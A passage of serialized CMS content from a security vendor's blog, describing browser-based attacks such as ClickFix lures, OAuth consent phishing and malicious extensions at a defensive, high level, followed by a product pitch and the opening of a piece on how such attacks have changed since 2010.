attack branch out to ",{"data":43968,"content":43970,"nodeType":883},{"uri":43969},"https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer/",[43971],{"data":43972,"marks":43973,"value":43975,"nodeType":864},{},[43974],{"type":1455},"Mac via the macOS terminal",{"data":43977,"marks":43978,"value":2924,"nodeType":864},{},[],{"data":43980,"content":43981,"nodeType":860},{},[43982],{"data":43983,"marks":43984,"value":43985,"nodeType":864},{},[],"Most commonly, these attacks are used to deliver infostealer malware, using stolen session cookies and credentials to access business apps and services. ",{"data":43987,"content":43988,"nodeType":860},{},[43989],{"data":43990,"marks":43991,"value":43992,"nodeType":864},{},[],"Like modern credential and session phishing, links to malicious pages are distributed over various delivery channels and using a variety of lures, including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error loading a webpage, and many more. ",{"data":43994,"content":43998,"nodeType":996},{"target":43995},{"sys":43996},{"id":43997,"type":1001,"linkType":1002},"6O9YiOfhpGFCDsTil9F3On",[],{"data":44000,"content":44001,"nodeType":860},{},[44002],{"data":44003,"marks":44004,"value":44005,"nodeType":864},{},[],"The variance in lure, and differences between different versions of the same lure, can make it difficult to fingerprint and detect based on visual elements alone. Also, many of the same protections being used to obfuscate and prevent analysis of phishing pages also apply to ClickFix pages, making it equally challenging to detect and block them. ",{"data":44007,"content":44008,"nodeType":860},{},[44009],{"data":44010,"marks":44011,"value":44012,"nodeType":864},{},[],"This leaves most of the detection and blocking down to endpoint-layer controls around user-level code execution and malware running on a device. The quantity of ClickFix-related headlines in the news would indicate that endpoint controls are being routinely bypassed, or perhaps evaded altogether by targeting personal or BYOD devices. ",{"data":44014,"content":44015,"nodeType":860},{},[44016],{"data":44017,"marks":44018,"value":44019,"nodeType":864},{},[],"There is a significant opportunity to detect these attacks in the browser and stop them at the earliest opportunity, before they reach the endpoint. Every ClickFix attack and variant has a key action in common — malicious code is copied from the page’s clipboard. In some cases, this happens without any user interaction (where the only requirement on the user is to run code that has been silently copied behind the scenes), presenting a strong indicator of malicious behavior that can be observed in the browser. ",{"data":44021,"content":44022,"nodeType":1005},{},[],{"data":44024,"content":44025,"nodeType":1312},{},[44026],{"data":44027,"marks":44028,"value":44030,"nodeType":864},{},[44029],{"type":899},"3. Malicious OAuth integrations",{"data":44032,"content":44033,"nodeType":860},{},[44034,44038,44044],{"data":44035,"marks":44036,"value":44037,"nodeType":864},{},[],"Malicious OAuth integrations are another way for attackers to compromise an app by tricking a user into authorizing an integration with a malicious, attacker-controlled app, with the level of data access and functionality dictated by the scopes authorized in the request. This is also known as ",{"data":44039,"content":44040,"nodeType":883},{"uri":22596},[44041],{"data":44042,"marks":44043,"value":22602,"nodeType":864},{},[],{"data":44045,"marks":44046,"value":1774,"nodeType":864},{},[],{"data":44048,"content":44052,"nodeType":996},{"target":44049},{"sys":44050},{"id":44051,"type":1001,"linkType":1002},"5JaP4WSfFsFSbvaa9BQBOq",[],{"data":44054,"content":44055,"nodeType":860},{},[44056],{"data":44057,"marks":44058,"value":44059,"nodeType":864},{},[],"This is an effective way for attackers to bypass hardened authentication and access controls by sidestepping the typical login process to take over an account and compromise business apps. This includes phishing-resistant MFA methods like passkeys — since the standard login process does not apply. ",{"data":44061,"content":44062,"nodeType":860},{},[44063],{"data":44064,"marks":44065,"value":44066,"nodeType":864},{},[],"A variant of this attack has dominated the headlines recently with the ongoing Salesforce breaches. In this scenario, the attacker tricked the victim into authorizing an attacker-controlled OAuth app via the device code authorization flow in Salesforce, which requires the user to enter an 8-digit code in place of a password or MFA factor.",{"data":44068,"content":44072,"nodeType":996},{"target":44069},{"sys":44070},{"id":44071,"type":1001,"linkType":1002},"3odEFcUcpKN553gHh2P5yr",[],{"data":44074,"content":44075,"nodeType":860},{},[44076],{"data":44077,"marks":44078,"value":44079,"nodeType":864},{},[],"Preventing malicious OAuth grants being authorized requires tight in-app management of user permissions and tenant security settings. This is no mean feat when considering the 100s of apps in use across the modern enterprise, many of which are not centrally managed by IT and security teams (or in some cases, are completely unknown to them). Even then, you’re limited by the controls made available by the app vendor. In this case, Salesforce has announced planned changes to OAuth app authorization in order to improve security prompted by these attacks — but many more apps with insecure configs exist for attackers to take advantage of in future. ",{"data":44081,"content":44082,"nodeType":860},{},[44083],{"data":44084,"marks":44085,"value":44086,"nodeType":864},{},[],"However, unlike app-specific integrations, browser-based security tools are well positioned to observe OAuth grants across all apps accessed in the browser — even the ones the security team doesn’t manage or know about, or without needing to pay for the app’s special security add-on to get visibility.",{"data":44088,"content":44089,"nodeType":1005},{},[],{"data":44091,"content":44092,"nodeType":1312},{},[44093],{"data":44094,"marks":44095,"value":44097,"nodeType":864},{},[44096],{"type":899},"4. Malicious browser extensions",{"data":44099,"content":44100,"nodeType":860},{},[44101],{"data":44102,"marks":44103,"value":44104,"nodeType":864},{},[],"Malicious browser extensions are another way for attackers to compromise your business apps by observing and capturing logins as they happen, and/or extracting session cookies and credentials saved in the browser cache and password manager. ",{"data":44106,"content":44107,"nodeType":860},{},[44108,44112,44121],{"data":44109,"marks":44110,"value":44111,"nodeType":864},{},[],"Attackers do this by creating their own malicious extension and tricking your users into installing it, or taking over an existing extension to gain access to browsers where it is already installed (",{"data":44113,"content":44115,"nodeType":883},{"uri":44114},"https://secureannex.com/blog/buying-browser-extensions/",[44116],{"data":44117,"marks":44118,"value":44120,"nodeType":864},{},[44119],{"type":1455},"it’s very easy for attackers to buy and add malicious updates to existing extensions",{"data":44122,"marks":44123,"value":44124,"nodeType":864},{},[],", easily passing extension web store security checks). ",{"data":44126,"content":44127,"nodeType":860},{},[44128,44132,44141,44145,44154,44157,44166],{"data":44129,"marks":44130,"value":44131,"nodeType":864},{},[],"The news around extension-based compromises has been on the rise since the ",{"data":44133,"content":44135,"nodeType":883},{"uri":44134},"https://www.bleepingcomputer.com/news/security/new-details-reveal-how-hackers-hijacked-35-google-chrome-extensions/",[44136],{"data":44137,"marks":44138,"value":44140,"nodeType":864},{},[44139],{"type":1455},"Cyberhaven extension",{"data":44142,"marks":44143,"value":44144,"nodeType":864},{},[]," was hacked in December 2024, along with at least 35 other extensions. Since then, there has been regular reporting on data-stealing extensions ",{"data":44146,"content":44148,"nodeType":883},{"uri":44147},"https://www.bleepingcomputer.com/news/security/data-stealing-chrome-extensions-impersonate-fortinet-youtube-vpns/",[44149],{"data":44150,"marks":44151,"value":44153,"nodeType":864},{},[44152],{"type":1455},"impersonating legitimate brands",{"data":44155,"marks":44156,"value":2232,"nodeType":864},{},[],{"data":44158,"content":44160,"nodeType":883},{"uri":44159},"https://www.bleepingcomputer.com/news/security/chrome-extensions-with-6-million-installs-have-hidden-tracking-code/",[44161],{"data":44162,"marks":44163,"value":44165,"nodeType":864},{},[44164],{"type":1455},"impacting millions of users",{"data":44167,"marks":44168,"value":2924,"nodeType":864},{},[],{"data":44170,"content":44171,"nodeType":860},{},[44172],{"data":44173,"marks":44174,"value":44175,"nodeType":864},{},[],"Risky browser extension permissions include broad data access, the ability to modify website content, track user activity, capture screenshots, and manage tabs or network requests. Permissions like \"read and change all data on all websites\" or access to cookies and browsing history are particularly dangerous as they can be exploited for session hijacking, data theft, malware injection, or phishing.",{"data":44177,"content":44178,"nodeType":860},{},[44179],{"data":44180,"marks":44181,"value":44182,"nodeType":864},{},[],"Generally, your employees should not be randomly installing browser extensions unless pre-approved by your security team. The reality, however, is that many organizations have very little visibility of the extensions their employees are using, and the potential risk they’re exposed to as a result. ",{"data":44184,"content":44185,"nodeType":860},{},[44186],{"data":44187,"marks":44188,"value":44189,"nodeType":864},{},[],"To tackle malicious extensions, security tools operating in the browser can track the browser extensions deployed, highlight risky permissions, compare with known-malicious extensions, identify fraudulent/unofficial versions of a legitimate extension, and highlight other risky properties commonly associated with malicious extensions (e.g. “Developer” extensions). ",{"data":44191,"content":44192,"nodeType":1005},{},[],{"data":44194,"content":44195,"nodeType":1312},{},[44196],{"data":44197,"marks":44198,"value":44200,"nodeType":864},{},[44199],{"type":899},"5. Malicious file delivery",{"data":44202,"content":44203,"nodeType":860},{},[44204],{"data":44205,"marks":44206,"value":44207,"nodeType":864},{},[],"Malicious files have been a core part of malware delivery and credential theft for many years. Just as non-email channels like malvertising and drive-by attacks are used to deliver phishing and ClickFix lures, malicious files are also distributed through similar means — leaving malicious file detection to basic known-bad checks, sandbox analysis using a proxy (not that useful in the context of sandbox-aware malware) or runtime analysis on the endpoint. ",{"data":44209,"content":44210,"nodeType":860},{},[44211],{"data":44212,"marks":44213,"value":44214,"nodeType":864},{},[],"This doesn’t just have to be malicious executables directly dropping malware onto the device. File downloads can also contain additional links taking the user to malicious content. In fact, one of the most common types of downloadable content are HTML Applications (HTAs), commonly used to spawn local phishing pages to stealthily capture credentials. More recently, attackers have been weaponizing SVG files for a similar purpose, running as self-contained phishing pages that render fake login portals entirely client-side. ",{"data":44216,"content":44217,"nodeType":860},{},[44218],{"data":44219,"marks":44220,"value":44221,"nodeType":864},{},[],"Even if malicious content cannot always be flagged from surface-level inspection of a file, recording file downloads in the browser is a useful addition to endpoint-based malware protection, and provides another layer of defense against file downloads that perform client-side attacks, or redirect the user to malicious web-based content. ",{"data":44223,"content":44224,"nodeType":1005},{},[],{"data":44226,"content":44227,"nodeType":1312},{},[44228],{"data":44229,"marks":44230,"value":44232,"nodeType":864},{},[44231],{"type":899},"6. Stolen credentials and MFA gaps",{"data":44234,"content":44235,"nodeType":860},{},[44236],{"data":44237,"marks":44238,"value":44239,"nodeType":864},{},[],"This last one isn’t so much a browser-based attack, but it is a product of them. When credentials are stolen through phishing or infostealer malware they can be used to take over accounts missing MFA. ",{"data":44241,"content":44242,"nodeType":860},{},[44243,44247,44254,44258,44267],{"data":44244,"marks":44245,"value":44246,"nodeType":864},{},[],"This isn’t the most sophisticated attack, but it’s very effective. You need only look at last year’s ",{"data":44248,"content":44249,"nodeType":883},{"uri":43761},[44250],{"data":44251,"marks":44252,"value":43767,"nodeType":864},{},[44253],{"type":1455},{"data":44255,"marks":44256,"value":44257,"nodeType":864},{},[]," account compromises or the ",{"data":44259,"content":44261,"nodeType":883},{"uri":44260},"https://pushsecurity.com/blog/why-attackers-are-targeting-jira-with-stolen-credentials?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[44262],{"data":44263,"marks":44264,"value":44266,"nodeType":864},{},[44265],{"type":1455},"Jira",{"data":44268,"marks":44269,"value":44270,"nodeType":864},{},[]," attacks earlier this year to see how attackers harness stolen credentials at scale. ",{"data":44272,"content":44273,"nodeType":860},{},[44274,44278,44287],{"data":44275,"marks":44276,"value":44277,"nodeType":864},{},[],"With the modern enterprise using hundreds of apps, the likelihood that an app hasn’t been configured for mandatory MFA (if possible) is high. And even when an app has been configured for SSO and connected to your primary corporate identity, ",{"data":44279,"content":44281,"nodeType":883},{"uri":44280},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=sidebar",[44282],{"data":44283,"marks":44284,"value":44286,"nodeType":864},{},[44285],{"type":1455},"local “ghost logins” can continue to exist",{"data":44288,"marks":44289,"value":44290,"nodeType":864},{},[],", accepting passwords with no MFA required. Just having visibility of your primary Identity Provider accounts (e.g. Google, Microsoft, Okta) and SSO-connected apps doesn't give you a full picture of your identity surface.",{"data":44292,"content":44293,"nodeType":860},{},[44294],{"data":44295,"marks":44296,"value":44297,"nodeType":864},{},[],"Logins can also be observed in the browser — in fact, it’s as close to a universal source of truth as you’re going to get about how your employees are actually logging in, which apps they’re using, and whether MFA is present, enabling security teams to find and fix vulnerable logins before they can be exploited by attackers. ",{"data":44299,"content":44300,"nodeType":1005},{},[],{"data":44302,"content":44303,"nodeType":1009},{},[44304],{"data":44305,"marks":44306,"value":24968,"nodeType":864},{},[44307],{"type":899},{"data":44309,"content":44310,"nodeType":860},{},[44311],{"data":44312,"marks":44313,"value":44314,"nodeType":864},{},[],"Attacks are increasingly happening in the browser. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams. ",{"data":44316,"content":44317,"nodeType":860},{},[44318],{"data":44319,"marks":44320,"value":44321,"nodeType":864},{},[],"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",{"data":44323,"content":44324,"nodeType":860},{},[44325,44328,44336],{"data":44326,"marks":44327,"value":39859,"nodeType":864},{},[],{"data":44329,"content":44331,"nodeType":883},{"uri":44330},"https://pushsecurity.com/demo?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[44332],{"data":44333,"marks":44334,"value":10299,"nodeType":864},{},[44335],{"type":1455},{"data":44337,"marks":44338,"value":2924,"nodeType":864},{},[],"6 browser-based attacks every security team should be prepared for","What security teams need to know about the browser-based attack techniques that are the leading cause of breaches.","2025-09-05T00:00:00.000Z","6-browser-based-attacks-every-security-team-should-be-prepared-for",{"items":44344},[44345,44347],{"sys":44346,"name":6593},{"id":6592},{"sys":44348,"name":342},{"id":6596},{"items":44350},[44351],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":44352},{"url":2740},{"__typename":2059,"sys":44354,"content":44355,"title":40965,"synopsis":40966,"hashTags":59,"publishedDate":40967,"slug":40968,"tagsCollection":44865,"authorsCollection":44871},{"id":40373},{"json":44356},{"data":44357,"content":44358,"nodeType":856},{},[44359,44365,44371,44387,44393,44409,44415,44418,44425,44431,44437,44442,44448,44488,44524,44531,44537,44553,44583,44588,44594,44599,44605,44612,44638,44643,44646,44653,44669,44685,44711,44716,44719,44726,44732,44812,44815,44822,44837,44843,44849],{"data":44360,"content":44361,"nodeType":860},{},[44362],{"data":44363,"marks":44364,"value":40384,"nodeType":864},{},[],{"data":44366,"content":44367,"nodeType":860},{},[44368],{"data":44369,"marks":44370,"value":40391,"nodeType":864},{},[],{"data":44372,"content":44373,"nodeType":860},{},[44374,44377,44384],{"data":44375,"marks":44376,"value":40398,"nodeType":864},{},[],{"data":44378,"content":44379,"nodeType":883},{"uri":40401},[44380],{"data":44381,"marks":44382,"value":40407,"nodeType":864},{},[44383],{"type":1455},{"data":44385,"marks":44386,"value":40411,"nodeType":864},{},[],{"data":44388,"content":44389,"nodeType":860},{},[44390],{"data":44391,"marks":44392,"value":40418,"nodeType":864},{},[],{"data":44394,"content":44395,"nodeType":860},{},[44396,44399,44406],{"data":44397,"marks":44398,"value":40425,"nodeType":864},{},[],{"data":44400,"content":44401,"nodeType":883},{"uri":39809},[44402],{"data":44403,"marks":44404,"value":40433,"nodeType":864},{},[44405],{"type":1455},{"data":44407,"marks":44408,"value":40437,"nodeType":864},{},[],{"data":44410,"content":44411,"nodeType":860},{},[44412],{"data":44413,"marks":44414,"value":40444,"nodeType":864},{},[],{"data":44416,"content":44417,"nodeType":1005},{},[],{"data":44419,"content":44420,"nodeType":1009},{},[44421],{"data":44422,"marks":44423,"value":40455,"nodeType":864},{},[44424],{"type":899},{"data":44426,"content":44427,"nodeType":860},{},[44428],{"data":44429,"marks":44430,"value":40462,"nodeType":864},{},[],{"data":44432,"content":44433,"nodeType":860},{},[44434],{"data":44435,"marks":44436,"value":40469,"nodeType":864},{},[],{"data":44438,"content":44441,"nodeType":996},{"target":44439},{"sys":44440},{"id":40474,"type":1001,"linkType":1002},[],{"data":44443,"content":44444,"nodeType":860},{},[44445],{"data":44446,"marks":44447,"value":40482,"nodeType":864},{},[],{"data":44449,"content":44450,"nodeType":941},{},[44451,44460,44479],{"data":44452,"content":44453,"nodeType":945},{},[44454],{"data":44455,"content":44456,"nodeType":860},{},[44457],{"data":44458,"marks":44459,"value":40495,"nodeType":864},{},[],{"data":44461,"content":44462,"nodeType":945},{},[44463],{"data":44464,"content":44465,"nodeType":860},{},[44466,44469,44476],{"data":44467,"marks":44468,"value":40505,"nodeType":864},{},[],{"data":44470,"content":44471,"nodeType":883},{"uri":40508},[44472],{"data":44473,"marks":44474,"value":441,"nodeType":864},{},[44475],{"type":1455},{"data":44477,"marks":44478,"value":40517,"nodeType":864},{},[],{"data":44480,"content":44481,"nodeType":945},{},[44482],{"data":44483,"content":44484,"nodeType":860},{},[44485],{"data":44486,"marks":44487,"value":40527,"nodeType":864},{},[],{"data":44489,"content":44490,"nodeType":860},{},[44491,44494,44501,44504,44511,44514,44521],{"data":44492,"marks":44493,"value":40534,"nodeType":864},{},[],{"data":44495,"content":44496,"nodeType":883},{"uri":40537},[44497],{"data":44498,"marks":44499,"value":40543,"nodeType":864},{},[44500],{"type":1455},{"data":44502,"marks":44503,"value":40547,"nodeType":864},{},[],{"data":44505,"content":44506,"nodeType":883},{"uri":40537},[44507],{"data":44508,"marks":44509,"value":40543,"nodeType":864},{},[44510],{"type":1455},{"data":44512,"marks":44513,"value":40558,"nodeType":864},{},[],{"data":44515,"content":44516,"nodeType":883},{"uri":40537},[44517],{"data":44518,"marks":44519,"value":40543,"nodeType":864},{},[44520],{"type":1455},{"data":44522,"marks":44523,"value":40569,"nodeType":864},{},[],{"data":44525,"content":44526,"nodeType":1312},{},[44527],{"data":44528,"marks":44529,"value":40577,"nodeType":864},{},[44530],{"type":899},{"data":44532,"content":44533,"nodeType":860},{},[44534],{"data":44535,"marks":44536,"value":40584,"nodeType":864},{},[],{"data":44538,"content":44539,"nodeType":860},{},[44540,44543,44550],{"data":44541,"marks":44542,"value":40591,"nodeType":864},{},[],{"data":44544,"content":44545,"nodeType":883},{"uri":40594},[44546],{"data":44547,"marks":44548,"value":40600,"nodeType":864},{},[44549],{"type":1455},{"data":44551,"marks":44552,"value":40604,"nodeType":864},{},[],{"data":44554,"content":44555,"nodeType":860},{},[44556,44559,44566,44569,44576,44579],{"data":44557,"marks":44558,"value":40611,"nodeType":864},{},[],{"data":44560,"content":44561,"nodeType":883},{"uri":40614},[44562],{"data":44563,"marks":44564,"value":5272,"nodeType":864},{},[44565],{"type":1455},{"data":44567,"marks":44568,"value":40623,"nodeType":864},{},[],{"data":44570,"content":44571,"nodeType":883},{"uri":5231},[44572],{"data":44573,"marks":44574,"value":40631,"nodeType":864},{},[44575],{"type":1455},{"data":44577,"marks":44578,"value":40635,"nodeType":864},{},[],{"data":44580,"marks":44581,"value":40640,"nodeType":864},{},[44582],{"type":899},{"data":44584,"content":44587,"nodeType":996},{"target":44585},{"sys":44586},{"id":40645,"type":1001,"linkType":1002},[],{"data":44589,"content":44590,"nodeType":860},{},[44591],{"data":44592,"marks":44593,"value":40653,"nodeType":864},{},[],{"data":44595,"content":44598,"nodeType":996},{"target":44596},{"sys":44597},{"id":40658,"type":1001,"linkType":1002},[],{"data":44600,"content":44601,"nodeType":860},{},[44602],{"data":44603,"marks":44604,"value":40666,"nodeType":864},{},[],{"data":44606,"content":44607,"nodeType":1312},{},[44608],{"data":44609,"marks":44610,"value":40674,"nodeType":864},{},[44611],{"type":899},{"data":44613,"content":44614,"nodeType":860},{},[44615,44618,44625,44628,44635],{"data":44616,"marks":44617,"value":40681,"nodeType":864},{},[],{"data":44619,"content":44620,"nodeType":883},{"uri":40684},[44621],{"data":44622,"marks":44623,"value":28189,"nodeType":864},{},[44624],{"type":1455},{"data":44626,"marks":44627,"value":40693,"nodeType":864},{},[],{"data":44629,"content":44630,"nodeType":883},{"uri":40537},[44631],{"data":44632,"marks":44633,"value":40543,"nodeType":864},{},[44634],{"type":1455},{"data":44636,"marks":44637,"value":40704,"nodeType":864},{},[],{"data":44639,"content":44642,"nodeType":996},{"target":44640},{"sys":44641},{"id":40709,"type":1001,"linkType":1002},[],{"data":44644,"content":44645,"nodeType":1005},{},[],{"data":44647,"content":44648,"nodeType":1009},{},[44649],{"data":44650,"marks":44651,"value":30578,"nodeType":864},{},[44652],{"type":899},{"data":44654,"content":44655,"nodeType":860},{},[44656,44659,44666],{"data":44657,"marks":44658,"value":40727,"nodeType":864},{},[],{"data":44660,"content":44661,"nodeType":883},{"uri":40730},[44662],{"data":44663,"marks":44664,"value":40736,"nodeType":864},{},[44665],{"type":1455},{"data":44667,"marks":44668,"value":40740,"nodeType":864},{},[],{"data":44670,"content":44671,"nodeType":860},{},[44672,44675,44682],{"data":44673,"marks":44674,"value":40747,"nodeType":864},{},[],{"data":44676,"content":44677,"nodeType":883},{"uri":40750},[44678],{"data":44679,"marks":44680,"value":40756,"nodeType":864},{},[44681],{"type":1455},{"data":44683,"marks":44684,"value":40760,"nodeType":864},{},[],{"data":44686,"content":44687,"nodeType":860},{},[44688,44691,44698,44701,44708],{"data":44689,"marks":44690,"value":40767,"nodeType":864},{},[],{"data":44692,"content":44693,"nodeType":883},{"uri":40508},[44694],{"data":44695,"marks":44696,"value":441,"nodeType":864},{},[44697],{"type":1455},{"data":44699,"marks":44700,"value":40778,"nodeType":864},{},[],{"data":44702,"content":44703,"nodeType":883},{"uri":20983},[44704],{"data":44705,"marks":44706,"value":40786,"nodeType":864},{},[44707],{"type":1455},{"data":44709,"marks":44710,"value":40790,"nodeType":864},{},[],{"data":44712,"content":44715,"nodeType":996},{"target":44713},{"sys":44714},{"id":27224,"type":1001,"linkType":1002},[],{"data":44717,"content":44718,"nodeType":1005},{},[],{"data":44720,"content":44721,"nodeType":1009},{},[44722],{"data":44723,"marks":44724,"value":40806,"nodeType":864},{},[44725],{"type":899},{"data":44727,"content":44728,"nodeType":860},{},[44729],{"data":44730,"marks":44731,"value":40813,"nodeType":864},{},[],{"data":44733,"content":44734,"nodeType":941},{},[44735,44744,44763],{"data":44736,"content":44737,"nodeType":945},{},[44738],{"data":44739,"content":44740,"nodeType":860},{},[44741],{"data":44742,"marks":44743,"value":40826,"nodeType":864},{},[],{"data":44745,"content":44746,"nodeType":945},{},[44747],{"data":44748,"content":44749,"nodeType":860},{},[44750,44753,44760],{"data":44751,"marks":44752,"value":40836,"nodeType":864},{},[],{"data":44754,"content":44755,"nodeType":883},{"uri":40537},[44756],{"data":44757,"marks":44758,"value":40543,"nodeType":864},{},[44759],{"type":1455},{"data":44761,"marks":44762,"value":40847,"nodeType":864},{},[],{"data":44764,"content":44765,"nodeType":945},{},[44766],{"data":44767,"content":44768,"nodeType":860},{},[44769,44772,44779,44782,44789,44792,44799,44802,44809],{"data":44770,"marks":44771,"value":40857,"nodeType":864},{},[],{"data":44773,"content":44774,"nodeType":883},{"uri":40860},[44775],{"data":44776,"marks":44777,"value":40866,"nodeType":864},{},[44778],{"type":1455},{"data":44780,"marks":44781,"value":3731,"nodeType":864},{},[],{"data":44783,"content":44784,"nodeType":883},{"uri":40872},[44785],{"data":44786,"marks":44787,"value":40878,"nodeType":864},{},[44788],{"type":1455},{"data":44790,"marks":44791,"value":3731,"nodeType":864},{},[],{"data":44793,"content":44794,"nodeType":883},{"uri":40884},[44795],{"data":44796,"marks":44797,"value":40890,"nodeType":864},{},[44798],{"type":1455},{"data":44800,"marks":44801,"value":10291,"nodeType":864},{},[],{"data":44803,"content":44804,"nodeType":883},{"uri":40896},[44805],{"data":44806,"marks":44807,"value":40902,"nodeType":864},{},[44808],{"type":1455},{"data":44810,"marks":44811,"value":40906,"nodeType":864},{},[],{"data":44813,"content":44814,"nodeType":1005},{},[],{"data":44816,"content":44817,"nodeType":1009},{},[44818],{"data":44819,"marks":44820,"value":3578,"nodeType":864},{},[44821],{"type":899},{"data":44823,"content":44824,"nodeType":860},{},[44825,44828,44834],{"data":44826,"marks":44827,"value":40923,"nodeType":864},{},[],{"data":44829,"content":44830,"nodeType":883},{"uri":7124},[44831],{"data":44832,"marks":44833,"value":28345,"nodeType":864},{},[],{"data":44835,"marks":44836,"value":39845,"nodeType":864},{},[],{"data":44838,"content":44839,"nodeType":860},{},[44840],{"data":44841,"marks":44842,"value":40939,"nodeType":864},{},[],{"data":44844,"content":44845,"nodeType":860},{},[44846],{"data":44847,"marks":44848,"value":40946,"nodeType":864},{},[],{"data":44850,"content":44851,"nodeType":860},{},[44852,44855,44862],{"data":44853,"marks":44854,"value":40953,"nodeType":864},{},[],{"data":44856,"content":44857,"nodeType":883},{"uri":5642},[44858],{"data":44859,"marks":44860,"value":40961,"nodeType":864},{},[44861],{"type":1455},{"data":44863,"marks":44864,"value":21,"nodeType":864},{},[],{"items":44866},[44867,44869],{"sys":44868,"name":342},{"id":6596},{"sys":44870,"name":6593},{"id":6592},{"items":44872},[44873],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":44874},{"url":4955},{"__typename":2059,"sys":44876,"content":44878,"title":45860,"synopsis":45861,"hashTags":59,"publishedDate":45862,"slug":45863,"tagsCollection":45864,"authorsCollection":45870},{"id":44877},"6OFdfAsoPUECeRAetWvedp",{"json":44879},{"data":44880,"content":44881,"nodeType":856},{},[44882,44889,44901,44913,44925,44937,44943,44962,44969,44985,44992,44998,45001,45009,45016,45023,45030,45036,45039,45047,45054,45074,45081,45088,45095,45102,45108,45115,45122,45129,45158,45165,45183,45190,45197,45217,45237,45257,45263,45270,45286,45293,45300,45307,45326,45334,45341,45348,45351,45359,45366,45373,45380,45423,45429,45436,45451,45540,45546,45553,45560,45623,45630,45637,45644,45650,45657,45664,45671,45677,45684,45691,45698,45704,45724,45731,45738,45781,45787,45790,45798,45822,45825,45832,45838,45844],{"data":44883,"content":44884,"nodeType":860},{},[44885],{"data":44886,"marks":44887,"value":44888,"nodeType":864},{},[],"Oh, look! A time capsule from 2010. Wonder what’s inside … ",{"data":44890,"content":44891,"nodeType":860},{},[44892,44897],{"data":44893,"marks":44894,"value":44896,"nodeType":864},{},[44895],{"type":899},"Listening to:",{"data":44898,"marks":44899,"value":44900,"nodeType":864},{},[]," “Like a G6” by Far East Movement (on a Nokia C7 — hey, it even had a touchscreen).",{"data":44902,"content":44903,"nodeType":860},{},[44904,44909],{"data":44905,"marks":44906,"value":44908,"nodeType":864},{},[44907],{"type":899},"Major news event:",{"data":44910,"marks":44911,"value":44912,"nodeType":864},{},[]," Eyjafjallajökull volcano erupts in Iceland, disrupting air travel.",{"data":44914,"content":44915,"nodeType":860},{},[44916,44921],{"data":44917,"marks":44918,"value":44920,"nodeType":864},{},[44919],{"type":899},"Worried about:",{"data":44922,"marks":44923,"value":44924,"nodeType":864},{},[]," Exploitable Flash browser plugins and static HTML phishing sites.",{"data":44926,"content":44927,"nodeType":860},{},[44928,44933],{"data":44929,"marks":44930,"value":44932,"nodeType":864},{},[44931],{"type":899},"How to be a hero?",{"data":44934,"marks":44935,"value":44936,"nodeType":864},{},[]," Roll out the latest AV, implement a web proxy, and add a “report phishing” button to your email solution.",{"data":44938,"content":44942,"nodeType":996},{"target":44939},{"sys":44940},{"id":44941,"type":1001,"linkType":1002},"54xYbMs0ii96xb2jgQVX9m",[],{"data":44944,"content":44945,"nodeType":860},{},[44946,44950,44958],{"data":44947,"marks":44948,"value":44949,"nodeType":864},{},[],"We’re halfway through 2025, and the time capsule for this year may need to be an XL when it comes to ",{"data":44951,"content":44952,"nodeType":883},{"uri":41433},[44953],{"data":44954,"marks":44955,"value":44957,"nodeType":864},{},[44956],{"type":1455},"how much has happened",{"data":44959,"marks":44960,"value":44961,"nodeType":864},{},[]," in the world of browser-based attacks. (Yet fittingly, Drake’s “Nokia” is a pop hit.)",{"data":44963,"content":44964,"nodeType":860},{},[44965],{"data":44966,"marks":44967,"value":44968,"nodeType":864},{},[],"While at least we don’t have to worry about Flash anymore, the browser is now the new battleground, and workforce identities are the most common target. Security teams are struggling with approaches and tools that attackers have outpaced.",{"data":44970,"content":44971,"nodeType":860},{},[44972,44976,44981],{"data":44973,"marks":44974,"value":44975,"nodeType":864},{},[],"In this article, we’ll cover how browser-based attacks have evolved, and how Push is taking a new approach with the release of our ",{"data":44977,"marks":44978,"value":44980,"nodeType":864},{},[44979],{"type":899},"Detections",{"data":44982,"marks":44983,"value":44984,"nodeType":864},{},[]," capabilities, now generally available to all customers.",{"data":44986,"content":44987,"nodeType":860},{},[44988],{"data":44989,"marks":44990,"value":44991,"nodeType":864},{},[],"Push Detections use real-time telemetry to help you understand context, user behavior, and attacker techniques, and then respond — a modern tool for modern browser-based attacks.",{"data":44993,"content":44997,"nodeType":996},{"target":44994},{"sys":44995},{"id":44996,"type":1001,"linkType":1002},"2ULDSj85bXtT2OgpXKBHtB",[],{"data":44999,"content":45000,"nodeType":1005},{},[],{"data":45002,"content":45003,"nodeType":1009},{},[45004],{"data":45005,"marks":45006,"value":45008,"nodeType":864},{},[45007],{"type":899},"The old world vs. the new world",{"data":45010,"content":45011,"nodeType":860},{},[45012],{"data":45013,"marks":45014,"value":45015,"nodeType":864},{},[],"In the early 2010s, the typical attack path involved sending a user an email with a link to a static HTML webpage (most commonly a generic Exchange Web Access clone) that tricked them into giving you Active Directory creds. These could be used to log in to an exposed remote desktop service or the victim’s mailbox, giving the attacker a foothold to install malware. Anyone who’s done “red teaming 101” will recognize this scenario. ",{"data":45017,"content":45018,"nodeType":860},{},[45019],{"data":45020,"marks":45021,"value":45022,"nodeType":864},{},[],"A compromised identity was once just part of a system compromise. That meant the scope of detection and response was focused on the organization’s Active Directory domain, correlated with endpoint and network logs. ",{"data":45024,"content":45025,"nodeType":860},{},[45026],{"data":45027,"marks":45028,"value":45029,"nodeType":864},{},[],"But now, identity attacks happen beyond traditional on-premises networks, impacting cloud identities that are created, used, and attacked in the browser. What was once the familiar backbone of business IT — internal apps and thick clients — has been replaced with a sprawling cloud and SaaS ecosystem that can be targeted directly via identity, without touching the endpoint. 